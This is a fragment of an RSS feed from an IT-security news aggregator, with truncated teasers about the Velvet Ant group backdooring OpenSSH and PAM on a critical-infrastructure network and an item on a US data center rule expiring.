<description><![CDATA[A long-running, highly disciplined intrusion attributed to the China-nexus actor known as Velvet Ant has been revealed as a near-decade campaign of silent access that culminated in the replacement of core authentication components OpenSSH binaries and PAM modules across a…
Read more →
The post Ve...]]></description>
<link>https://tsecurity.de/de/3599009/it-security-nachrichten/velvet-ant-hackers-backdoor-openssh-and-pam-to-spy-on-critical-infrastructure-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599009/it-security-nachrichten/velvet-ant-hackers-backdoor-openssh-and-pam-to-spy-on-critical-infrastructure-network/</guid>
<pubDate>Mon, 15 Jun 2026 14:06:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A long-running, highly disciplined intrusion attributed to the China-nexus actor known as Velvet Ant has been revealed as a near-decade campaign of silent access that culminated in the replacement of core authentication components OpenSSH binaries and PAM modules across a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/velvet-ant-hackers-backdoor-openssh-and-pam-to-spy-on-critical-infrastructure-network/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/velvet-ant-hackers-backdoor-openssh-and-pam-to-spy-on-critical-infrastructure-network/">Velvet Ant Hackers Backdoor OpenSSH and PAM to Spy on Critical Infrastructure Network</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Velvet Ant Hackers Backdoor OpenSSH and PAM to Spy on Critical Infrastructure Network]]></title>
<description><![CDATA[A long-running, highly disciplined intrusion attributed to the China-nexus actor known as Velvet Ant has been revealed as a near-decade campaign of silent access that culminated in the replacement of core authentication components OpenSSH binaries and PAM modules across a segregated critical-infr...]]></description>
<link>https://tsecurity.de/de/3598976/it-security-nachrichten/velvet-ant-hackers-backdoor-openssh-and-pam-to-spy-on-critical-infrastructure-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598976/it-security-nachrichten/velvet-ant-hackers-backdoor-openssh-and-pam-to-spy-on-critical-infrastructure-network/</guid>
<pubDate>Mon, 15 Jun 2026 13:52:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A long-running, highly disciplined intrusion attributed to the China-nexus actor known as Velvet Ant has been revealed as a near-decade campaign of silent access that culminated in the replacement of core authentication components OpenSSH binaries and PAM modules across a segregated critical-infrastructure network. The intrusion chain began with compromises of internet-facing systems where the operator […]</p>
<p>The post <a href="https://gbhackers.com/velvet-ant-hackers-backdoor-openssh/">Velvet Ant Hackers Backdoor OpenSSH and PAM to Spy on Critical Infrastructure Network</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The US Government Is Letting a Key Data Center Regulation Expire]]></title>
<description><![CDATA[The federal government is planning to let a rule regulating federal data center operations sunset in September with no replacement.]]></description>
<link>https://tsecurity.de/de/3598671/it-nachrichten/the-us-government-is-letting-a-key-data-center-regulation-expire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598671/it-nachrichten/the-us-government-is-letting-a-key-data-center-regulation-expire/</guid>
<pubDate>Mon, 15 Jun 2026 11:47:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The federal government is planning to let a rule regulating federal data center operations sunset in September with no replacement.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,21ms -->